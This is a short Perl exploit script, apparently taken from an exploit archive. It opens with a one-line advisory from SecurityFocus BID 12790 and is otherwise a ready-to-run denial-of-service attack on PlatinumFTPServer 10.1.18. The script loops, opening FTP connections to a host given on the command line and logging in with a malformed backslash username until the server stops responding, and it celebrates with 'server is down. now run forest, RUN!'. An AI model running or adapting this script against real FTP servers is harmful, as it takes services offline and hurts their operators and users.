41 lines
No EOL
1.1 KiB
Perl
Executable file
41 lines
No EOL
1.1 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/12790/info
|
|
|
|
PlatinumFTPServer is prone to a denial-of-service vulnerability. This issue is reported to occur when a remote user makes 50 or more connections that attempt to authenticate with a malformed user name.
|
|
|
|
#!/usr/bin/perl
|
|
# plftpdos1.pl - Remote DoS against PlatinumFTP 10.1.18 using \
|
|
#
|
|
# If you don't get the server down try to change/play a little bit with
|
|
# the Timeout
|
|
|
|
# 2005/05/03
|
|
#
|
|
# ports at securityforest dot com | greetings to muts, barabas, s|33py,
|
|
# revised and all guys at www.whitehat.co.il
|
|
|
|
|
|
use strict;
|
|
use Net::FTP;
|
|
|
|
my $host;
|
|
my $username = '\\';
|
|
|
|
if ($#ARGV < 0) { &syntax(); }
|
|
$host = @ARGV[0];
|
|
|
|
my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21) or die "can you see a ftp server? i can't.\n";
|
|
|
|
print "denial of service in progress\n";
|
|
|
|
while (my $ftp = Net::FTP->new($host, Timeout => 2, Debug => 0, Port => 21))
|
|
{
|
|
my $ftp = Net::FTP->new($host, Timeout => 0.1, Debug => 0, Port => 21);
|
|
$ftp->login($username);
|
|
}
|
|
|
|
print "server is down. now run forest, RUN!\n";
|
|
|
|
sub syntax {
|
|
print "\nUsage: pftpdos1.pl IP\n";
|
|
exit (1);
|
|
} |